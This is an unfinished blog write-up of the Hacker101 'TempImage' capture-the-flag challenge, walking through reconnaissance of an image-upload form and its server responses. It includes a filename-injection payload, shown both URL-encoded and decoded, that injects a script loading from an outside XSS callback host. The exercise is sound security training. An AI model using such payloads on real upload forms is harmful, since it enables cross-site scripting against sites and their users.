dev.lwlx.xyz

GitHub

Twitter

Hacker101 CTF TempImage [moderate] Write-Up

a work in progress


lwlx

23. January 2021

@0x0000005

WIP

This is my Write Up for the "TempImage" challenge of HackerOne's CTF.

As usual we get a link to webpage, it seems to some sort of cloud storage application, on the main Page we get a really simple page:

1<!-- https://ctf.hacker101.com/ctf/launch/12 -->
2
3<html>
4  <head>
5    <title>TempImage &mdash; Trial</title>
6  </head>
7  <body>
8    <h1>TempImage</h1>
9    <p>
10      <b>UNREGISTERED</b>
11    </p>
12    <p>
13      <a href="upload.php">Upload image</a>
14    </p>
15  </body>
16</html>

It signifies that its an UNEGISTERED version of the app, thus working in trial mode.

Enumeration

So lets start to explore the app and what it can do. We start by clicking the "Upload image" Button. This leads us to a new page /upload.php, here we can select a file from our computer, and have a submit button to send the form.

The form will be sent to a doUpload.php file. Upon closer inspection we alos see that there is a hidden field "filename", which gets filled in by a JS snippet.

1   <h1>Upload</h1>
2		<form action="doUpload.php" method="POST" enctype="multipart/form-data">
3			<input type="file" name="file" id="file">
4			<input type="hidden" name="filename" id="filename">
5			<input type="submit" value="Upload">
6		</form>
7		<script>
8			$(document).ready(function() {
9				$('#file').change(function(e) {
10					$('#filename').val(e.target.files[0].name)
11				})
12			})
13	 </script>

So it seems this lil script extracts the file.name prop from the fileOpbject the user uploads to the input type="file".

Lets Try it out, It seems the file inpput allows any file to be chosen, lets try a 5mb .gif file.

1<center><h1>413 Request Entity Too Large</h1></center>
2<hr><center>nginx/1.14.0 (Ubuntu)</center>

OK, fair, maybe 5mb was a it large, but we know we're working with an nginx 1.14 server on Ubuntu. So how about we try a smaller gif?

1ERROR: Only PNG format supported in trial.

Okay, finally we know what the app expects from us, a PNG file. So we try jsut that. The upload succeeds, thus redirecting us to a new url: /files/be9c26aaea9d9b5085c7f6eed0812745_uhhhh.png

so it seems our files are uploaded to the /files/ directory, what a suprise, the file stil contains our original filename, preceeded by some gibberish.

we should deffinetly try to exploit this, check wheter or not they sanitize our filename.

Lets try uploading a file named: javascript%3Aeval%28%27var%20a%3Ddocument.createElement%28%5C%27script%5C%27%29%3Ba.src%3D%5C%27https%3A%2F%2FDiscover.xss.ht%5C%27%3Bdocument.body.appendChild%28a%29%27%29.png

We now get redirected to this url http://35.190.155.168/d29c8e00db/files/9975e7e24fac21e8b877a6d08efe09c6_javascript%3Aeval%28%27var%20a%3Ddocument.createElement%28%5C%27script%5C%27%29%3Ba.src%3D%5C%27https%3A%2F%2FDiscover.xss.ht%5C%27%3Bdocument.body.appendChild%28a%29%27%29.png

and we get served this content:

1Not Found
2The requested URL /files/9975e7e24fac21e8b877a6d08efe09c6_javascript:eval('var a=document.createElement(\'script\');a.src=\'https:/Discover.xss.ht\';document.body.appendChild(a)').png was not found on this server.
3
4Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 52736

so it seems there is potential there, we just need a more sophisticated payload to upload.

Taking a step back

It's important not to get tunnelvision and only focus on your first finding, so lets take a step back and analyze the website using Burp Suite. Maybe we'll find something. Lets analyze the upload URL first:

1GET /d29c8e00db/upload.php HTTP/1.1
2Host: 35.190.155.168
3Cache-Control: max-age=0
4Upgrade-Insecure-Requests: 1
5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
6Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7Accept-Encoding: gzip, deflate
8Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
9Connection: close

This does not tell us that much, it seems the server could accep more than just PNG tho.

How about if we upload an image?

POST /d29c8e00db/doUpload.php HTTP/1.1

image upload Request

This Post is marked as WIP and will be updated continously.

© lwlx. 2021

Version 0.6.1